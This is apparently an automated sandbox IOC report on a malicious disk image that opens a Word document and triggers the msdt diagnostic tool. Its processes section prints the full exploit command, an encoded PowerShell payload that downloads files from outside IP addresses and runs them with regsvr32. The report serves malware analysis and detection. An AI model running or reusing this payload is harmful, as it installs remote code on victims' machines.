IOC Report
68101181_048154.img

loading gif

Files

File Path
Type
Category
Malicious
68101181_048154.img
data
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\87E203A5-891F-43FE-BEFA-581865619F97
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].htm (copy)
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES473B.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES4765.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES5EDA.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c33guzif.vqh.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czf5qbdw.tlo.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc276.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Read-Only, Archive, ctime=Mon Jun 6 08:04:14 2022, mtime=Tue Jun 7 10:38:53 2022, atime=Mon Jun 6 08:04:14 2022, length=10144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Little-endian UTF-16 Unicode text, with CR line terminators
modified
C:\Users\user\Documents\20220607\PowerShell_transcript.468325.jUlojUo4.20220607192048.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\TS_ProgramCompatibilityWizard.ps1
UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\CL_LocalizationData.psd1
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
dropped
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
There are 24 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "E:\doc276.docx" /o "
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
malicious
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
malicious
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
C:\Windows\System32\drivers\udfs.sys
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://185.234.247.119/1240405476.dat
185.234.247.119
malicious
http://185.234.247.119/123.RES
185.234.247.119
malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
http://schemas.xmlsoap.org/soap/encoding/vr$
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
http://schemas.xmlsoap.org/soap/http
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
http://www.borland.com/namespaces/TypesAr1
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
http://www.borland.com/namespaces/Types-IWSDLPublish
unknown
https://store.office.cn/addinstemplate
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.borland.com/namespaces/Types$r
unknown
https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
http://schemas.xmlsoap.org/wsdl/mime/
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
http://www.borland.com/namespaces/TypesU
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
http://schemas.xmlsoap.org/wsdl/soap/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
http://www.borland.com/namespaces/Types7r
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
There are 90 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
185.234.247.119
unknown
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
=v0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
>v0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
z0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
wa0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\24E65
24E65
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
1
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
UpdateComplete
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Data
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General
FileFormatBallotBoxAppIDBootedOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
CacheReady
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
LastRequest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
CacheReady
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
LastUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
NextUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Place MRU\Change
ChangeId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU\Change
ChangeId
